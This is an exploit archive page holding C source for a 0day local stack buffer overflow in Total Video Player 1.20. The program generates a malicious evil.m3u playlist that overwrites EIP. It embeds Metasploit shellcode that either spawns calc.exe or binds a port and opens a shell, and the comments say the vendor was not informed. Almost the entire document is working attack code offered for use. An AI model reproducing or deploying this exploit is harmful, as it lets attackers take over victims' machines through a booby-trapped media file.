Home / os / win95

tvp120-overflow.txt

Posted on 08 February 2008

/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2. I got the ideea to look in a prior version of TVP and surprinse vuln to ,just as V1.30. When parsing a crafted .m3u file stack gets corrupted,due a long string,and causes a stack overflow.We get control of the EBP and EIP registers.The ESP register points exactly after the retaddress position. [corrupted stack] [EIP->points here][ESP->points here] So do a jmp back and a JMP ESP and it points to a specific part of the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w. Vendor not informed yet. Special THANKS to Expanders !!!! */ #include<stdio.h> #include <stdlib.h> #include <string.h> #include<windows.h> #define FIRST "#EXTM3U #EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho D:\" #define LAST ".mp3 " #define OFFSET 545 #define EVILFILE "evil.m3u" //shellcode from metasploit char scz1[]= "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63" "x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32" "x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38" "x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e" "x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62" "x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74" "x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c" "x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39" "x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b" "x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64" "x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37" "x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b" "x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b" "x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47" "x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f" "x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61" "x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f" "x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55" "x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42" "x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57" "x70x63"; char scz2[]="x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x50" "x8axfax90x83xebxfcxe2xf4xacxe0x11xddxb8x73x05x6f" "xafxeax71xfcx74xaex71xd5x6cx01x86x95x28x8bx15x1b" "x1fx92x71xcfx70x8bx11xd9xdbxbex71x91xbexbbx3ax09" "xfcx0ex3axe4x57x4bx30x9dx51x48x11x64x6bxdexdexb8" "x25x6fx71xcfx74x8bx11xf6xdbx86xb1x1bx0fx96xfbx7b" "x53xa6x71x19x3cxaexe6xf1x93xbbx21xf4xdbxc9xcax1b" "x10x86x71xe0x4cx27x71xd0x58xd4x92x1ex1ex84x16xc0" "xafx5cx9cxc3x36xe2xc9xa2x38xfdx89xa2x0fxdex05x40" "x38x41x17x6cx6bxdax05x46x0fx03x1fxf6xd1x67xf2x92" "x05xe0xf8x6fx80xe2x23x99xa5x27xadx6fx86xd9xa9xc3" "x03xd9xb9xc3x13xd9x05x40x36xe2xebxccx36xd9x73x71" "xc5xe2x5ex8ax20x4dxadx6fx86xe0xeaxc1x05x75x2axf8" "xf4x27xd4x79x07x75x2cxc3x05x75x2axf8xb5xc3x7cxd9" "x07x75x2cxc0x04xdexafx6fx80x19x92x77x29x4cx83xc7" "xafx5cxafx6fx80xecx90xf4x36xe2x99xfdxd9x6fx90xc0" "x09xa3x36x19xb7xe0xbex19xb2xbbx3ax63xfax74xb8xbd" "xaexc8xd6x03xddxf0xc2x3bxfbx21x92xe2xaex39xecx6f" "x25xcex05x46x0bxddxa8xc1x01xdbx90x91x01xdbxafxc1" "xafx5ax92x3dx89x8fx34xc3xafx5cx90x6fxafxbdx05x40" "xdbxddx06x13x94xeex05x46x02x75x2axf8x2ex52x18xe3" "x03x75x2cx6fx80x8axfax90"; char jmpback[] = "xE9xDExFDxFFxFF"; void Notes(); int main() { FILE *p; unsigned char *buffer; unsigned int offset=0; unsigned int retaddress=0x015EE557; int input=0; Notes(); if((p=fopen(EVILFILE,"wb"))==NULL) { printf("error "); exit(0); } scanf("%d",&input); switch(input) { case 1: buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12); memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12); offset=OFFSET; memcpy(buffer+offset,&retaddress,4); offset=OFFSET+4; offset+=12; memcpy(buffer+offset,scz1,strlen(scz1)); offset+=strlen(scz1); memset(buffer+offset,0x00,1); fprintf(p,"%s%s%s",FIRST,buffer,LAST); fclose(p); break; case 2: buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12); memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12); offset=OFFSET; memcpy(buffer+offset,&retaddress,4); offset=OFFSET+4; offset+=12; memcpy(buffer+offset,scz2,strlen(scz2)); offset+=strlen(scz2); memset(buffer+offset,0x00,1); fprintf(p,"%s%s%s",FIRST,buffer,LAST); fclose(p); break; } free(buffer); return 0; } void Notes() { printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ "); printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow "); printf("Credits for finding this bug&&sploit go to fl0 fl0w "); printf("SPECIAL THANKS TO EXPANDERS "); printf("{1}Spawn Calc.exe "); printf("{2}Bind port&&spanw a shell "); printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ "); }

 

TOP